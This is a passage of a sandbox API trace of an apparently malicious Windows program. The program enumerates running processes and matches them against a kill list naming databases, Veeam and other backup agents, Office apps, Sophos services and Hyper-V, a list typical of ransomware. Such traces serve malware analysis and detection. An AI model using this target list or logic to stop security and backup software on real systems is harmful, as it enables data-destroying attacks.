lpMultiByteStr="dllhost.exe", lpUsedDefaultChar=0x0) returned 12 [0102.653] lstrcpyA (in: lpString1=0x567fabc, lpString2="dllhost.exe" | out: lpString1="dllhost.exe") returned="dllhost.exe" [0102.653] StrStrIA (lpFirst="dllhost.exe", lpSrch="Hyper-v") returned 0x0 [0102.653] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1208, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x3ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhostw.exe")) returned 1 [0102.654] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="taskhostw.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 14 [0102.654] LocalAlloc (uFlags=0x40, uBytes=0xe) returned 0x3570b60 [0102.654] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="taskhostw.exe", cchWideChar=-1, lpMultiByteStr=0x3570b60, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="taskhostw.exe", lpUsedDefaultChar=0x0) returned 14 [0102.654] lstrcpyA (in: lpString1=0x567fabc, lpString2="taskhostw.exe" | out: lpString1="taskhostw.exe") returned="taskhostw.exe" [0102.654] StrStrIA (lpFirst="taskhostw.exe", lpSrch="Hyper-v") returned 0x0 [0102.654] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1210, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x3ac, pcPriClassBase=6, dwFlags=0x0, szExeFile="UsoClient.exe")) returned 1 [0102.655] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="UsoClient.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 14 [0102.656] LocalAlloc (uFlags=0x40, uBytes=0xe) returned 0x3570b78 [0102.656] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="UsoClient.exe", cchWideChar=-1, lpMultiByteStr=0x3570b78, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="UsoClient.exe", lpUsedDefaultChar=0x0) returned 14 [0102.656] lstrcpyA (in: lpString1=0x567fabc, lpString2="UsoClient.exe" | out: lpString1="UsoClient.exe") returned="UsoClient.exe" [0102.656] StrStrIA (lpFirst="UsoClient.exe", lpSrch="Hyper-v") returned 0x0 [0102.656] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1218, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x3ac, pcPriClassBase=6, dwFlags=0x0, szExeFile="taskhostw.exe")) returned 1 [0102.657] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="taskhostw.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 14 [0102.657] LocalAlloc (uFlags=0x40, uBytes=0xe) returned 0x3570b90 [0102.657] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="taskhostw.exe", cchWideChar=-1, lpMultiByteStr=0x3570b90, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="taskhostw.exe", lpUsedDefaultChar=0x0) returned 14 [0102.657] lstrcpyA (in: lpString1=0x567fabc, lpString2="taskhostw.exe" | out: lpString1="taskhostw.exe") returned="taskhostw.exe" [0102.657] StrStrIA (lpFirst="taskhostw.exe", lpSrch="Hyper-v") returned 0x0 [0102.657] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1224, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x3ac, pcPriClassBase=6, dwFlags=0x0, szExeFile="UNPCampaignManager.exe")) returned 1 [0102.658] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="UNPCampaignManager.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 23 [0102.658] LocalAlloc (uFlags=0x40, uBytes=0x17) returned 0x357f820 [0102.658] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="UNPCampaignManager.exe", cchWideChar=-1, lpMultiByteStr=0x357f820, cbMultiByte=23, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="UNPCampaignManager.exe", lpUsedDefaultChar=0x0) returned 23 [0102.658] lstrcpyA (in: lpString1=0x567fabc, lpString2="UNPCampaignManager.exe" | out: lpString1="UNPCampaignManager.exe") returned="UNPCampaignManager.exe" [0102.659] StrStrIA (lpFirst="UNPCampaignManager.exe", lpSrch="Hyper-v") returned 0x0 [0102.659] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x122c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x3ac, pcPriClassBase=6, dwFlags=0x0, szExeFile="DeviceCensus.exe")) returned 1 [0102.707] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="DeviceCensus.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0102.707] LocalAlloc (uFlags=0x40, uBytes=0x11) returned 0x357f860 [0102.708] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="DeviceCensus.exe", cchWideChar=-1, lpMultiByteStr=0x357f860, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="DeviceCensus.exe", lpUsedDefaultChar=0x0) returned 17 [0102.708] lstrcpyA (in: lpString1=0x567fabc, lpString2="DeviceCensus.exe" | out: lpString1="DeviceCensus.exe") returned="DeviceCensus.exe" [0102.708] StrStrIA (lpFirst="DeviceCensus.exe", lpSrch="Hyper-v") returned 0x0 [0102.708] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1234, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x3ac, pcPriClassBase=6, dwFlags=0x0, szExeFile="AppHostRegistrationVerifier.exe")) returned 1 [0102.709] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="AppHostRegistrationVerifier.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 32 [0102.709] LocalAlloc (uFlags=0x40, uBytes=0x20) returned 0x357ebe0 [0102.709] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="AppHostRegistrationVerifier.exe", cchWideChar=-1, lpMultiByteStr=0x357ebe0, cbMultiByte=32, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="AppHostRegistrationVerifier.exe", lpUsedDefaultChar=0x0) returned 32 [0102.709] lstrcpyA (in: lpString1=0x567fabc, lpString2="AppHostRegistrationVerifier.exe" | out: lpString1="AppHostRegistrationVerifier.exe") returned="AppHostRegistrationVerifier.exe" [0102.709] StrStrIA (lpFirst="AppHostRegistrationVerifier.exe", lpSrch="Hyper-v") returned 0x0 [0102.709] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1280, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x122c, pcPriClassBase=6, dwFlags=0x0, szExeFile="conhost.exe")) returned 1 [0102.711] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="conhost.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0102.711] LocalAlloc (uFlags=0x40, uBytes=0xc) returned 0x3570c80 [0102.711] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="conhost.exe", cchWideChar=-1, lpMultiByteStr=0x3570c80, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="conhost.exe", lpUsedDefaultChar=0x0) returned 12 [0102.711] lstrcpyA (in: lpString1=0x567fabc, lpString2="conhost.exe" | out: lpString1="conhost.exe") returned="conhost.exe" [0102.711] StrStrIA (lpFirst="conhost.exe", lpSrch="Hyper-v") returned 0x0 [0102.711] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1294, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x1210, pcPriClassBase=6, dwFlags=0x0, szExeFile="conhost.exe")) returned 1 [0102.712] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="conhost.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0102.712] LocalAlloc (uFlags=0x40, uBytes=0xc) returned 0x3570d70 [0102.712] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="conhost.exe", cchWideChar=-1, lpMultiByteStr=0x3570d70, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="conhost.exe", lpUsedDefaultChar=0x0) returned 12 [0102.712] lstrcpyA (in: lpString1=0x567fabc, lpString2="conhost.exe" | out: lpString1="conhost.exe") returned="conhost.exe" [0102.712] StrStrIA (lpFirst="conhost.exe", lpSrch="Hyper-v") returned 0x0 [0102.712] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x11dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="rxodge.exe")) returned 1 [0102.713] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="rxodge.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0102.713] LocalAlloc (uFlags=0x40, uBytes=0xb) returned 0x3570b30 [0102.714] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="rxodge.exe", cchWideChar=-1, lpMultiByteStr=0x3570b30, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="rxodge.exe", lpUsedDefaultChar=0x0) returned 11 [0102.714] lstrcpyA (in: lpString1=0x567fabc, lpString2="rxodge.exe" | out: lpString1="rxodge.exe") returned="rxodge.exe" [0102.714] StrStrIA (lpFirst="rxodge.exe", lpSrch="Hyper-v") returned 0x0 [0102.714] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4b4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x23c, pcPriClassBase=8, dwFlags=0x0, szExeFile="sppsvc.exe")) returned 1 [0102.715] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="sppsvc.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0102.715] LocalAlloc (uFlags=0x40, uBytes=0xb) returned 0x3570c38 [0102.715] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="sppsvc.exe", cchWideChar=-1, lpMultiByteStr=0x3570c38, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="sppsvc.exe", lpUsedDefaultChar=0x0) returned 11 [0102.715] lstrcpyA (in: lpString1=0x567fabc, lpString2="sppsvc.exe" | out: lpString1="sppsvc.exe") returned="sppsvc.exe" [0102.715] StrStrIA (lpFirst="sppsvc.exe", lpSrch="Hyper-v") returned 0x0 [0102.715] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xa50, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x23c, pcPriClassBase=8, dwFlags=0x0, szExeFile="TrustedInstaller.exe")) returned 1 [0102.716] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="TrustedInstaller.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 21 [0102.716] LocalAlloc (uFlags=0x40, uBytes=0x15) returned 0x357f9a0 [0102.716] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="TrustedInstaller.exe", cchWideChar=-1, lpMultiByteStr=0x357f9a0, cbMultiByte=21, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="TrustedInstaller.exe", lpUsedDefaultChar=0x0) returned 21 [0102.716] lstrcpyA (in: lpString1=0x567fabc, lpString2="TrustedInstaller.exe" | out: lpString1="TrustedInstaller.exe") returned="TrustedInstaller.exe" [0102.716] StrStrIA (lpFirst="TrustedInstaller.exe", lpSrch="Hyper-v") returned 0x0 [0102.716] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xf90, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x2a4, pcPriClassBase=8, dwFlags=0x0, szExeFile="TiWorker.exe")) returned 1 [0102.718] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="TiWorker.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0102.718] LocalAlloc (uFlags=0x40, uBytes=0xd) returned 0x3570d88 [0102.718] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="TiWorker.exe", cchWideChar=-1, lpMultiByteStr=0x3570d88, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="TiWorker.exe", lpUsedDefaultChar=0x0) returned 13 [0102.718] lstrcpyA (in: lpString1=0x567fabc, lpString2="TiWorker.exe" | out: lpString1="TiWorker.exe") returned="TiWorker.exe" [0102.718] StrStrIA (lpFirst="TiWorker.exe", lpSrch="Hyper-v") returned 0x0 [0102.718] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xf90, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x2a4, pcPriClassBase=8, dwFlags=0x0, szExeFile="TiWorker.exe")) returned 0 [0102.718] CloseHandle (hObject=0x358) returned 1 [0102.719] SetEvent (hEvent=0x210) returned 1 [0102.737] Sleep (dwMilliseconds=0x2710) [0113.193] lstrcpyA (in: lpString1=0x567f090, lpString2="sql,mysql,veeam,oracle,ocssd,dbsnmp,synctime,agntsvc,isqlplussvc,xfssvccon,mydesktopservice,ocautoupds,encsvc,firefox,tbirdconfig,mydesktopqos,ocomm,dbeng50,sqbcoreservice,excel,infopath,msaccess,mspub,onenote,outlook,powerpnt,steam,thebat,thunderbird,visio,winword,wordpad,EduLink2SIMS,bengine,benetns,beserver,pvlsvr,beremote,VxLockdownServer,postgres,fdhost,WSSADMIN,wsstracing,OWSTIMER,dfssvc.exe,dfsrs.exe,swc_service.exe,sophos,SAVAdminService,SavService.exe,Hyper-v" | out: lpString1="sql,mysql,veeam,oracle,ocssd,dbsnmp,synctime,agntsvc,isqlplussvc,xfssvccon,mydesktopservice,ocautoupds,encsvc,firefox,tbirdconfig,mydesktopqos,ocomm,dbeng50,sqbcoreservice,excel,infopath,msaccess,mspub,onenote,outlook,powerpnt,steam,thebat,thunderbird,visio,winword,wordpad,EduLink2SIMS,bengine,benetns,beserver,pvlsvr,beremote,VxLockdownServer,postgres,fdhost,WSSADMIN,wsstracing,OWSTIMER,dfssvc.exe,dfsrs.exe,swc_service.exe,sophos,SAVAdminService,SavService.exe,Hyper-v") returned="sql,mysql,veeam,oracle,ocssd,dbsnmp,synctime,agntsvc,isqlplussvc,xfssvccon,mydesktopservice,ocautoupds,encsvc,firefox,tbirdconfig,mydesktopqos,ocomm,dbeng50,sqbcoreservice,excel,infopath,msaccess,mspub,onenote,outlook,powerpnt,steam,thebat,thunderbird,visio,winword,wordpad,EduLink2SIMS,bengine,benetns,beserver,pvlsvr,beremote,VxLockdownServer,postgres,fdhost,WSSADMIN,wsstracing,OWSTIMER,dfssvc.exe,dfsrs.exe,swc_service.exe,sophos,SAVAdminService,SavService.exe,Hyper-v" [0113.194] CreateToolhelp32Snapshot (dwFlags=0xf, th32ProcessID=0x0) returned 0x370 [0113.227] Process32FirstW (in: hSnapshot=0x370, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0113.228] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="[System Process]", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0113.228] LocalAlloc (uFlags=0x40, uBytes=0x11) returned 0x357fc20 [0113.228] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="[System Process]", cchWideChar=-1, lpMultiByteStr=0x357fc20, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="[System Process]", lpUsedDefaultChar=0x0) returned 17 [0113.228] lstrcpyA (in: lpString1=0x567fabc, lpString2="[System Process]" | out: lpString1="[System Process]") returned="[System Process]" [0113.228] StrStrIA (lpFirst="[System Process]", lpSrch="sql") returned 0x0 [0113.228] Process32NextW (in: hSnapshot=0x370, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6b, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0113.229] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="System", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 7 [0113.229] LocalAlloc (uFlags=0x40, uBytes=0x7) returned 0x357e218 [0113.230] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="System", cchWideChar=-1, lpMultiByteStr=0x357e218, cbMultiByte=7, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="System", lpUsedDefaultChar=0x0) returned 7 [0113.230] lstrcpyA (in: lpString1=0x567fabc, lpString2="System" | out: lpString1="System") returned="System" [0113.230] StrStrIA (lpFirst="System", lpSrch="sql") returned 0x0 [0113.230] Process32NextW (in: hSnapshot=0x370, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x140, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0113.231] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="smss.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 9 [0113.231] LocalAlloc (uFlags=0x40, uBytes=0x9) returned 0x3570ce0 [0113.231] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="smss.exe", cchWideChar=-1, lpMultiByteStr=0x3570ce0, cbMultiByte=9, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="smss.exe", lpUsedDefaultChar=0x0) returned 9 [0113.231] lstrcpyA (in: lpString1=0x567fabc, lpString2="smss.exe" | out: lpString1="smss.exe") returned="smss.exe" [0113.231] StrStrIA (lpFirst="smss.exe", lpSrch="sql") returned 0x0 [0113.231] Process32NextW (in: hSnapshot=0x370, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x198, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x18c, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0113.232] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="csrss.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 10 [0113.232] LocalAlloc (uFlags=0x40, uBytes=0xa) returned 0x3570cf8 [0113.232] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="csrss.exe", cchWideChar=-1, lpMultiByteStr=0x3570cf8, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="csrss.exe", lpUsedDefaultChar=0x0) returned 10 [0113.232] lstrcpyA (in: lpString1=0x567fabc, lpString2="csrss.exe" | out: lpString1="csrss.exe") returned="csrss.exe" [0113.232] StrStrIA (lpFirst="csrss.exe", lpSrch="sql") returned 0x0 [0113.232] Process32NextW (in: hSnapshot=0x370, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x18c, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0113.233] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="wininit.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0113.233] LocalAlloc (uFlags=0x40, uBytes=0xc) returned 0x3570d58 [0113.233] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="wininit.exe", cchWideChar=-1, lpMultiByteStr=0x3570d58, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="wininit.exe", lpUsedDefaultChar=0x0) returned 12 [0113.233] lstrcpyA (in: lpString1=0x567fabc, lpString2="wininit.exe" | out: lpString1="wininit.exe") returned="wininit.exe" [0113.233] StrStrIA (lpFirst="wininit.exe", lpSrch="sql") returned 0x0 [0113.233] Process32NextW (in: hSnapshot=0x370, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1e4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x1d4, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0113.235] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="csrss.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 10 [0113.235] LocalAlloc (uFlags=0x40, uBytes=0xa) returned 0x3570b00 [0113.235] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="csrss.exe", cchWideChar=-1, lpMultiByteStr=0x3570b00, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="csrss.exe", lpUsedDefaultChar=0x0) returned 10 [0113.235] lstrcpyA (in: lpString1=0x567fabc, lpString2="csrss.exe" | out: lpString1="csrss.exe") returned="csrss.exe" [0113.235] StrStrIA (lpFirst="csrss.exe", lpSrch="sql") returned 0x0 [0113.235] Process32NextW (in: hSnapshot=0x370, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x220, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x1d4, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0113.236] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="winlogon.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0113.236] LocalAlloc (uFlags=0x40, uBytes=0xd) returned 0x3570e90 [0113.236] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="winlogon.exe", cchWideChar=-1, lpMultiByteStr=0x3570e90, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="winlogon.exe", lpUsedDefaultChar=0x0) returned 13 [0113.236] lstrcpyA (in: lpString1=0x567fabc, lpString2="winlogon.exe" | out: lpString1="winlogon.exe") returned="winlogon.exe" [0113.236] StrStrIA (lpFirst="winlogon.exe", lpSrch="sql") returned 0x0 [0113.236] Process32NextW (in: hSnapshot=0x370, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x23c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x1dc, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0113.416] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="services.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0113.416] LocalAlloc (uFlags=0x40, uBytes=0xd) returned 0x3570fb0 [0113.416] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="services.exe", cchWideChar=-1, lpMultiByteStr=0x3570fb0, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="services.exe", lpUsedDefaultChar=0x0) returned 13 [0113.416] lstrcpyA (in: lpString1=0x567fabc, lpString2="services.exe" | out: lpString1="services.exe") returned="services.exe" [0113.416] StrStrIA (lpFirst="services.exe", lpSrch="sql") returned 0x0 [0113.416] Process32NextW (in: hSnapshot=0x370, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x244, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x1dc, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0113.418] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="lsass.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 10 [0113.418] LocalAlloc (uFlags=0x40, uBytes=0xa) returned 0x3570ef0 [0113.418] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="lsass.exe", cchWideChar=-1, lpMultiByteStr=0x3570ef0, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="lsass.exe", lpUsedDefaultChar=0x0) returned 10 [0113.418] 